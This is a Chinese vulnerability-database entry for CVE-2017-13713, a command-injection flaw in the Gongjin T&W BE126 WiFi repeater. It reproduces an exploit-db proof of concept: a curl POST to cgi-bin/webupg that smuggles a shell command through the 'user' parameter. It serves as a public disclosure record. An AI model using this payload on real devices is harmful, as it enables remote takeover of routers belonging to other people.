Gongjin Electronics T&W WIFI Repeater BE126 安全漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1124215 漏洞类型 操作系统命令注入
发布时间 2017-09-04 更新时间 2019-10-23
CVE编号 CVE-2017-13713 CNNVD-ID CNNVD-201708-1166
漏洞平台 Hardware CVSS评分 6.5
|漏洞来源
https://www.exploit-db.com/exploits/42608
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201708-1166
|漏洞详情
Gongjin Electronics T&W WIFI Repeater BE126是中国共进电子(Gongjin Electronics)公司的一款无线上网中继器。 Gongjin Electronics T&W WIFI Repeater BE126中存在安全漏洞。远程攻击者可通过向cgi-bin/webupg发送带有元字符的‘user’参数利用该漏洞执行任意代码。
|漏洞EXP
# Exploit Title:  WIFI Repeater BE126 – Remote Code Execution
# Date Publish: 09/09/2017
# Exploit Authors: Hay Mizrachi, Omer Kaspi

# Contact: haymizrachi@gmail.com, komerk0@gmail.com
# Vendor Homepage: http://www.twsz.com
# Category: Webapps
# Version: 1.0
# Tested on: Windows/Ubuntu 16.04

# CVE: CVE-2017-13713

1 - Description:

HTTP POST request that contains user parmater which can give us to run
Remote Code Execution to the device.
The parameter is not sanitized at all, which cause him to be vulnerable.


2 - Proof of Concept:

curl -d "name=HTTP&url="http://www.test.com&user=;echo hacked!! >
/var/mycode;&password=a&port=8&dir=a"
--cookie "Cookie: sessionsid=XXXXX; auth=ok expires=Sun, 15-May-2112
01:45:46 GMT; langmanulset=yes;
sys_UserName=admin; expires=Mon, 31-Jan-2112 16:00:00 GMT; language=en_us"
-X POST http://beconnected.client/cgi-bin/webupg

3 - Timeline:

29/4/2017 – Vulnerability Discovered.
29/4/2017 - Vendor not responding.
03/09/2017 – Exploit published.
|参考资料

来源:MISC
链接:http://packetstormsecurity.com/files/143978/Wireless-Repeater-BE126-Remote-Code-Execution.html